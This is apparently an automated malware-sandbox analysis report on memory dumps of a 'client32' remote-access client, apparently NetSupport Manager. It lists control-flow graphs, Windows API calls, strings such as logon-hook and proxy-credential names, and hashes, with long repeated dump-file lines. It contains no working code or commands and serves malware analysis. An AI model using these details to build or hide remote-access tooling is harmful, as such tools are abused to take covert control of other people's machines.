                                                                                                                        • Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
                                                                                                                        • Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                        • Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2163 685a6ba0-685a6c14 call 685b4710 call 68595e90 GetTickCount call 685a9210 2170 685a6c1a-685a6c1c 2163->2170 2171 685a6fb9-685a6fc9 call 685b28e1 2163->2171 2173 685a6c26-685a6c33 GetTickCount 2170->2173 2175 685a6c42-685a6c49 2173->2175 2176 685a6c35-685a6c3d call 685a6940 2173->2176 2177 685a6c4b call 685997c0 2175->2177 2178 685a6c50-685a6c57 2175->2178 2176->2175 2177->2178 2181 685a6c59-685a6c61 Sleep 2178->2181 2182 685a6c66-685a6c6d 2178->2182 2183 685a6f97-685a6f9e 2181->2183 2184 685a6c6f-685a6c7c WaitForSingleObject 2182->2184 2185 685a6c82-685a6cc2 call 685b3c10 select 2182->2185 2186 685a6c20 2183->2186 2187 685a6fa4-685a6fb6 call 685b28e1 2183->2187 2184->2185 2185->2187 2192 685a6cc8-685a6ccb 2185->2192 2186->2173 2193 685a6ccd-685a6cdf Sleep 2192->2193 2194 685a6ce4-685a6ce6 2192->2194 2193->2183 2194->2173 2195 685a6cec-685a6cf9 GetTickCount 2194->2195 2196 685a6d00-685a6d1c 2195->2196 2197 685a6f89-685a6f91 2196->2197 2198 685a6d22 2196->2198 2197->2183 2197->2196 2199 685a6d28-685a6d2b 2198->2199 2200 685a6d3d-685a6d45 2199->2200 2201 685a6d2d-685a6d36 2199->2201 2200->2197 2203 685a6d4b-685a6d95 call 685b3753 call 68595c90 2200->2203 2201->2199 2202 685a6d38 2201->2202 2202->2197 2208 685a6d9b 2203->2208 2209 685a6f4f-685a6f7c GetTickCount InterlockedExchange call 685a77e0 2203->2209 2210 685a6dac-685a6ded call 68599310 2208->2210 2209->2183 2215 685a6f7e-685a6f83 2209->2215 2216 685a6f3a-685a6f46 call 685930a0 2210->2216 2217 685a6df3-685a6e58 GetTickCount InterlockedExchange call 685b3753 call 685b3c10 2210->2217 2215->2197 2223 685a6f47-685a6f4c call 6859a4e0 2216->2223 2226 685a6e5a-685a6e5b 2217->2226 2227 685a6e8b-685a6e99 call 685a28d0 2217->2227 2223->2209 2229 685a6e5d-685a6e74 call 68596f50 2226->2229 2230 685a6e76-685a6e89 call 685994e0 2226->2230 2234 685a6e9e-685a6ea4 2227->2234 2237 685a6ea7-685a6ebd call 685a77e0 2229->2237 2230->2234 2234->2237 2240 685a6ebf-685a6f1d InterlockedDecrement SetEvent _memmove call 68595c90 2237->2240 2241 685a6f25-685a6f38 call 685930a0 2237->2241 2246 685a6f23 2240->2246 2247 685a6da0-685a6da6 2240->2247 2241->2223 2246->2209 2247->2210
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A6BD5
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A6C26
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 685A6C5B
                                                                                                                          • Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950
                                                                                                                        • WaitForSingleObject.KERNEL32(00000304,?), ref: 685A6C7C
                                                                                                                        • _memmove.LIBCMT ref: 685A6C93
                                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 685A6CB4
                                                                                                                        • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 685A6CD9
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A6CEC
                                                                                                                        • _calloc.LIBCMT ref: 685A6D76
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A6DF3
                                                                                                                        • InterlockedExchange.KERNEL32(02B42F1A,00000000), ref: 685A6E01
                                                                                                                        • _calloc.LIBCMT ref: 685A6E33
                                                                                                                        • _memmove.LIBCMT ref: 685A6E47
                                                                                                                        • InterlockedDecrement.KERNEL32(02B42EC2), ref: 685A6EC3
                                                                                                                        • SetEvent.KERNEL32(00000308), ref: 685A6ECF
                                                                                                                        • _memmove.LIBCMT ref: 685A6EF4
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A6F4F
                                                                                                                        • InterlockedExchange.KERNEL32(02B42E62,-685DA188), ref: 685A6F60
                                                                                                                        Strings
                                                                                                                        • ReadMessage returned FALSE. Terminating connection, xrefs: 685A6F3A
                                                                                                                        • ProcessMessage returned FALSE. Terminating connection, xrefs: 685A6F25
                                                                                                                        • ResumeTimeout, xrefs: 685A6BBA
                                                                                                                        • FALSE, xrefs: 685A6E67
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A6E62
                                                                                                                        • httprecv, xrefs: 685A6BDD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                        • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                        • API String ID: 1449423504-919941520
                                                                                                                        • Opcode ID: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
                                                                                                                        • Instruction ID: 5768964ac529070e8d603857501e83de661ed71089ed95d69a90bef8bcf9960d
                                                                                                                        • Opcode Fuzzy Hash: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
                                                                                                                        • Instruction Fuzzy Hash: B7B1A0B5D002549FDF20DB68CC84BEEB7B4EB49344F81409AEA59A7240E7B49EC4CF95

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2248 11085840-1108585d call 11085830 2251 1108585f-1108586f call 1115e4d1 2248->2251 2252 11085870-11085880 call 11141240 2248->2252 2257 11085882-1108588a 2252->2257 2257->2257 2258 1108588c-11085892 2257->2258 2259 11085893-11085899 2258->2259 2259->2259 2260 1108589b-110858d2 LoadLibraryA 2259->2260 2261 11085939-1108594e GetProcAddress 2260->2261 2262 110858d4-110858db 2260->2262 2265 110859dc-110859ed call 1115e4d1 2261->2265 2266 11085954-11085963 GetProcAddress 2261->2266 2263 110858dd-1108592e GetModuleFileNameA call 11080be0 LoadLibraryA 2262->2263 2264 11085930-11085933 2262->2264 2263->2264 2264->2261 2264->2265 2266->2265 2268 11085965-11085974 GetProcAddress 2266->2268 2268->2265 2271 11085976-11085985 GetProcAddress 2268->2271 2271->2265 2273 11085987-11085996 GetProcAddress 2271->2273 2273->2265 2274 11085998-110859a7 GetProcAddress 2273->2274 2274->2265 2275 110859a9-110859b8 GetProcAddress 2274->2275 2275->2265 2276 110859ba-110859c9 GetProcAddress 2275->2276 2276->2265 2277 110859cb-110859da GetProcAddress 2276->2277 2277->2265 2278 110859ee-11085a03 call 1115e4d1 2277->2278
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1108592C
                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                        • API String ID: 2201880244-3035937465
                                                                                                                        • Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                        • Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
                                                                                                                        • Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                        • Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                        • GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                        • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 11105EDB
                                                                                                                          • Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
                                                                                                                          • Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                          • Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                          • Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11105EEF
                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
                                                                                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
                                                                                                                          • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                          • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
                                                                                                                          • Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                          • Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                          • Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
                                                                                                                        • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                        • API String ID: 539809342-403456261
                                                                                                                        • Opcode ID: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                        • Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
                                                                                                                        • Opcode Fuzzy Hash: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                        • Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                          • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                          • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                          • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                        • PostMessageA.USER32(00010480,000006CF,00000007,00000000), ref: 1113623F
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • SetWindowTextA.USER32(00010480,00000000), ref: 111362E7
                                                                                                                        • IsWindowVisible.USER32(00010480), ref: 111363AC
                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
                                                                                                                        • IsWindowVisible.USER32(00010480), ref: 111363DA
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11136408
                                                                                                                        • EnableWindow.USER32(00010480,00000001), ref: 11136417
                                                                                                                        • IsWindowVisible.USER32(00010480), ref: 11136468
                                                                                                                        • IsWindowVisible.USER32(00010480), ref: 11136475
                                                                                                                        • EnableWindow.USER32(00010480,00000000), ref: 11136489
                                                                                                                        • EnableWindow.USER32(00010480,00000000), ref: 111363EF
                                                                                                                          • Part of subcall function 1112E330: ShowWindow.USER32(00010480,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354
                                                                                                                        • EnableWindow.USER32(00010480,00000001), ref: 1113649D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                        • API String ID: 3453649892-3803836183
                                                                                                                        • Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                        • Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
                                                                                                                        • Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                        • Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<Zh
                                                                                                                        • API String ID: 2111968516-3873424096
                                                                                                                        • Opcode ID: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
                                                                                                                        • Instruction ID: 33063267e8ada4de353dc1dea75aee9a45cf1d88fb422f9f4f127c992a54f939
                                                                                                                        • Opcode Fuzzy Hash: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
                                                                                                                        • Instruction Fuzzy Hash: 3D2272B6A00368AFDF21CF68CCC0EEEB7B9AB4A204F8485D9E559A7540D6315F84CF51
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 11030457
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 11030465
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                        • InterlockedExchange.KERNEL32(02248D58,00001388), ref: 11030746
                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
                                                                                                                        • String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
                                                                                                                        • API String ID: 711497182-3782231422
                                                                                                                        • Opcode ID: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                        • Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
                                                                                                                        • Opcode Fuzzy Hash: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                        • Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 110303C3
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                        • InterlockedExchange.KERNEL32(02248D58,00001388), ref: 11030746
                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                          • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
